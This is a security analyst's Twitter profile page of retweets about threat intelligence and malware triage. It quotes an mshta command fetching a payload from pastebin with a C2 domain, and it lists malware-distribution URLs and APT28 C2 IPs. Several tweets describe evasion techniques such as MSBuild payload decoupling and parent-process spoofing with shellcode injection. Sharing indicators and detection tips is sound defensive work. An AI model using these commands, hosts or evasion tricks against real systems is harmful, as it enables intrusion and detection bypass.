Devon Kerr

@_devonkerr_

Intelligence & Analytics Team Lead Security | custodian of secret histories | seeking payment in change

Northern Virginia
Joined: October 2014

Tweets


  1. Retweeted
    4 Feb

    Inspired by awesome people, last year I made a cheatsheet for measuring CTI aspects. This year I've moved it to github, tweaked the sheet a bit and updated it to make it easier to maintain for both myself & you folks. Expect more content on CTI & RT. Cheers!
  2. Retweeted
    31 Jan

    A genealogy of 10 malware EXEs that share code - and one that doesn't belong - visualized. The rows are individual samples, and the color-blocks are their functions. A somewhat complicated algorithm is used to draw a plausible evolutionary lineage. Work from my CyberGenome days.
  3. Retweeted
    1 Feb

    Load encrypted PE from XML Attribute. MSBuild is still the best.😅 MSBuild sets Property then calls Execute. Use this example to decouple payloads & prove that all security products have a "Single File Bias". Decouple payloads to subvert detection.
  4. Retweeted
    30 Jan

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org
  5. Retweeted
    30 Jan

    New Twist on an older technique MD5: 4b82f1de393a07aa9ba91d046e2fd6b0 Execute Assembly via System.Runtime.InteropServices.RegistrationServices.UnregisterAssembly. Basically just Another Way to Call Instead of CreateInstance. There is more here but that was fun.
  6. Retweeted
    28 Jan

    [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:
  7. Retweeted
    26 Jan

    A Red Teamer's Guide to GPOs and OUs
  8. Retweeted
    24 Jan

    IOCs, the decompiled C# code with deobfuscated strings, a registry data config decrypter (for those who are infected) and some information on the Project TajMahal malware sample uploaded in 2019 to Virustotal:
  9. Retweeted
    23 Jan

    Interesting sample, using minimal macro to write to startup folder for persistence & uses IE via COM to download 2 txt files (no noisy ps or abnormal exec).
  10. Retweeted

    In this new , Insikt Group assesses that repeated communications from a targeted European energy sector mail server to a PupyRAT C2 are sufficient to indicate a likely intrusion:
  11. Retweeted
    20 Jan

    New Epoch 2 urls //www.divyapushti.org/wp-admin/cmLoLV/ //www.lespianosduvexin.fr/revslider0/htr/ //csdnshop.com/wp-admin/0kuev1/ //chihuitest.bodait.com/cgi-bin/krh/ s://studiodentistico-candeo.it/wp-content/hF/
  12. Retweeted
    20 Jan

    When I come across a new thing in that I'm trying to understand, is one of my go-to tools. 20: Check out 's list of great CyberChef 🤖👨‍🍳 recipes for insight (and inspiration!) on what that great tool can do: 🔗
  13. Retweeted
    20 Jan
    Replying to

    This article explains it well.
  14. Retweeted
    20 Jan

    I recently updated Get-PE in PowerShellArsenal to parse out the debug directory so that PDB strings can be extracted programmatically. I did it because needed to confirm the absence of debug strings as one of many post-build OPSEC checks. Dude is a master operator. 😍
  15. Retweeted

    Because some people asked, here's APT28 infra from October till now. They set up around 2-3 C2s a month. 184.95.51.172 2020-01 😈 78.142.19.114 2019-12 💀 80.255.3.116 2019-12 💀 193.70.80.214 2019-11 💀 185.141.63.103 2019-11 💀 109.169.15.73 2019-10 💀 178.32.251.98 2019-10 💀
  16. Retweeted
    18 Jan
    Replying to

    How to help?
  17. Retweeted
    17 Jan

    Lessons learned here are: a) alert on file writes to startup folder by office processes (not noisy) b) monitor continuous network connections from cscript.exe
  18. Retweeted
    18 Jan

    ": a Stealthy Lateral Movement Strategy" is now available to read. Read if interested to see a new practical lateral movement Demo (TDS (MS SQL) & FTP): Prototype will be released soon
  19. Retweeted
    17 Jan

    I spent some time learning about blockdlls and parent process spoofing from and . Using a recent sample from SubTee, I modified it to spoof the parent process and inject x64 shellcode from a dll on UNC into hidden iexplore.exe.
  20. Retweeted
    15 Jan

    Fun fact for the day: IntegrityLevel within process creation events provides context to detection opportunities. Example: Open powershell as administrator, the integrity is "High". Processes running under that process will now be high as well. (1/5)
